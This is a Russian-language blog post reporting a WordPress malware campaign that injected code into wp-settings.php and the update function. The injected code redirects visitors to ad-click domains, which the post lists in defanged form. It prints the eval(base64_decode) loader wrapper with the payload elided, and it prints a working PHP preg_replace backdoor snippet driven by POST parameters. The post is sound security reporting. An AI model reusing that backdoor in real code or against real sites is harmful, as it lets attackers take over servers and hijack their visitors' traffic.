Более 1000 блогов на платформе Wordpress уже инфицированы зловредом, который заблаговременно внедрился в скрипт автоматического обновления wp-admin/includes/update.php. Атаку нашел Денис Синегубко из компании Unmask Parasites.
Так как атака началась в районе 20 апреля, перед выходом новой версии Wordpress 3.3.2, к настоящему моменту функцией автоматического обновления воспользовалось большое число админов. Многие из них, так, добавили в свои блоги вредоносный код.
Инфицированные сайты производят редирект по следующим адресам:
hxxp://berega .in/?site=&q=&Searchengine=hxxp://zizigoba .in/?site=&q=&Searchengine=hxxp://vivizaza .be/?site=8&q=&Searchengine=
После пользователей перенаправляют по URL вроде этих:
hxxp://riotorio .com/search/?q=hxxp://lazgosearch .com/search?_t=1&q=http://gabazasearch .com/?_t=1&q=
В результате, злоумышленники производят монетизацию трафика при помощи рекламных программ с оплатой за клики.
Атака проведена путём введения в файл wp-settings.php дополнительного кода (см. расшифровку):
// For an advanced caching plugin to use. Uses a static drop-in because you would only want one.// Start cache settingseval(base64_decode('...long unreadable string here...'));// Finish cache settings// Start cache settings// Finish cache settings
В коде есть несколько интересных особенностей. К примеру, он устанавливает cookie и перенаправляет пользователей лишь в том случае, если cookie отсутствует. Помимо того, он отправляет IP-адрес пользователя на удалённый сервер, чтоб блокировать редирект для этого IP в будущем. Всё это сделано для скрытия атаки путём затруднения её повторения.
Есть фрагмент, который выполняет функцию бэкдора, так что злоумышленники могут потом модифицировать код на каждом заражённом сервере.
if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv'])) {$c = $_POST['cadv'];$c = str_replace("\\\\", "\\", $c);$g = $_POST['gadv'];$g = str_replace("\\\"", "\"", $g);$r = preg_replace("$c", $g, 'sss 4');die();}
За исключением wp-settings.php, модификации подвергается функция wp_update_core в файле wp-admin/includes/update.php. Расшифрованный код см. тут. Именно она отвечает за осуществление автоматического обновления Wordpress.
Комментариев нет:
Отправить комментарий